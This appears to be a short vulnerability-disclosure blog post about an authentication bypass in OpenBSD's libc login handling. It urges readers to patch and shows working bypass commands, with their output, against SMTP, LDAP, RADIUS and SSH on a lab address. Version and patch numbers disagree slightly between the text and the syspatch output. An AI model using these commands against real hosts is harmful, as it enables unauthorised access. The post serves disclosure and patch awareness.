New authentication bypass vulnerability found in OpenBSD
Sometimes Zero days in widely used software is the simpliest thing.
An remote authentication vulnerability has been found in
the latest version of OpenBSD which is 6.6,
Due to an insufficient username validation in libc
a remote third party can exploit the login libc function.
If you are running OpenBSD
it means its time to run syspatch
# syspatch Get/Verify syspatch65-011_expat.tgz 100% |*********| 588 KB 00:02 Installing patch 011_expat Get/Verify syspatch65-012_sysupgr... 100% |********| 11482 00:00 Installing patch 012_sysupgrade Relinking to create unique kernel... done; reboot to load the new kernel Errata can be reviewed under /var/syspatch
A patch has been written and published in the latest patch 010_libcauth.patch.
Exploiting the authentication bypass
A report of the vulnerability has been published
on the Bugtraq mailing lists.
The vulnerability can easily be exploited by providing a
username with the flag “-schallenge”
(or “-schallenge:passwd” to force a passwd-style authentication).
The report describes the vulnerability and the affecting parts:
if authentication is done with just appending “auth” in a rule set
then your system is vulnerable.
The authentication is exploitable:
$ printf '\0-schallenge\0whatever' | openssl base64 AC1zY2hhbGxlbmdlAHdoYXRldmVy $ openssl s_client -connect 192.168.56.121:25 -starttls smtp ... EHLO client.example.com ... AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy 235 2.0.0 Authentication succeeded
$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whatever SASL/PLAIN authentication started ldap_sasl_interactive_bind_s: Invalid credentials (49) $ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whatever SASL/PLAIN authentication started SASL username: -schallenge ... # numResponses: 1
if bsdauth is enabled in /etc/radiusd.conf:
$ radiusctl test 192.168.56.121 secret -schallenge password whatever ... Reply-Message = "Authentication succeeded"
$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \ -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121 ... debug1: Next authentication method: keyboard-interactive
$ su -L -- -schallenge Segmentation fault
This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.